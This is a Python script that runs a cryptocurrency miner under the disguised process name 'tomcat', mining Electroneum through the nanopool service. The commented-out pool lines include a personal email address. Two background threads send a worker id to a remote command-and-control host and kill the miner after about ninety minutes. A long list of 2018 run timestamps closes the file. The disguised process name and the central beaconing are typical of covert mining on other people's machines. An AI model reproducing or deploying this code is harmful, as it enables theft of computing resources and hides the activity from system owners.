import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:26:06.822498
#2018-02-17 16:13:01.506458
#2018-02-17 18:00:01.831542
#2018-02-17 19:47:04.680533
#2018-02-17 21:33:06.267270
#2018-02-17 23:17:05.874454
#2018-02-18 01:04:05.032595
#2018-02-18 02:52:07.804918
#2018-02-18 04:41:01.604731
#2018-02-18 06:33:04.228866
#2018-02-18 08:21:02.132398
#2018-02-18 10:10:03.512307
#2018-02-18 11:56:07.026613
#2018-02-18 13:41:06.692813
#2018-02-18 15:32:07.414101
#2018-02-18 17:20:08.097741
#2018-02-18 19:09:05.333977
#2018-02-18 20:55:08.134883
#2018-02-18 22:42:04.259491
#2018-02-19 00:31:05.998605
#2018-02-19 02:16:06.893780
#2018-02-19 04:03:03.658412
#2018-02-19 05:46:05.492493
#2018-02-19 07:36:01.730052
#2018-02-19 09:25:07.198019
#2018-02-19 11:15:04.735875
#2018-02-19 13:02:01.537529
#2018-02-19 14:51:06.471664
#2018-02-19 16:39:04.554712
#2018-02-19 18:26:06.244256
#2018-02-19 20:11:04.575128
#2018-02-19 22:01:05.418104
#2018-02-19 23:46:01.603924
#2018-02-20 01:33:05.604573
#2018-02-20 03:21:04.412615
#2018-02-20 05:09:06.513788
#2018-02-20 06:52:01.264115
#2018-02-20 08:38:02.137112
#2018-02-20 10:22:07.882639
#2018-02-20 12:07:09.201927
#2018-02-20 13:53:09.336448
#2018-02-20 15:38:05.091547
#2018-02-20 17:21:06.763729
#2018-02-20 19:12:10.025884
#2018-02-20 21:01:05.061360
#2018-02-20 22:47:04.073369
#2018-02-21 00:28:04.696421
#2018-02-21 02:13:07.291612
#2018-02-21 03:59:04.201984
#2018-02-21 05:46:06.366391
#2018-02-21 07:35:02.951390
#2018-02-21 09:19:06.931887
#2018-02-21 11:08:05.805433
#2018-02-21 12:56:01.686410
#2018-02-21 14:45:06.816263
#2018-02-21 16:33:07.379532
#2018-02-21 18:23:06.800479
#2018-02-21 20:09:06.304887
#2018-02-21 21:56:03.959562
#2018-02-21 23:45:11.571979
#2018-02-22 01:34:06.566921
#2018-02-22 03:22:04.072841
#2018-02-22 05:08:07.665791
#2018-02-22 06:52:01.625545
#2018-02-22 08:41:08.344515
#2018-02-22 10:28:08.741850
#2018-02-22 12:16:05.016287
#2018-02-22 14:02:07.581453
#2018-02-22 15:51:05.835501
#2018-02-22 17:40:04.015985
#2018-02-22 19:26:09.080971
#2018-02-22 21:18:01.343753
#2018-02-22 23:03:05.223794
#2018-02-23 00:49:07.011035
#2018-02-23 02:38:03.726710
#2018-02-23 04:27:07.496872
#2018-02-23 06:14:01.777009
#2018-02-23 08:01:06.336947
#2018-02-23 10:17:03.371961
#2018-02-23 12:03:04.780963
#2018-02-23 13:51:06.755369
#2018-02-23 15:44:06.973120
#2018-02-23 17:30:01.547680
#2018-02-23 19:17:01.336248
#2018-02-23 21:02:06.022182
#2018-02-23 22:48:05.864115
#2018-02-24 00:37:05.611662
#2018-02-24 02:27:03.661694
#2018-02-24 04:18:01.264932
#2018-02-24 06:05:06.934667
#2018-02-24 07:54:07.064616
#2018-02-24 09:40:04.527253
#2018-02-24 11:36:01.376138
#2018-02-24 13:26:01.694866
#2018-02-24 15:14:05.408089
#2018-02-24 17:03:04.330543
#2018-02-24 18:53:01.596138
#2018-02-24 20:41:06.810025
#2018-02-24 22:50:09.022402
#2018-02-25 03:03:05.441125
#2018-02-25 06:50:08.429777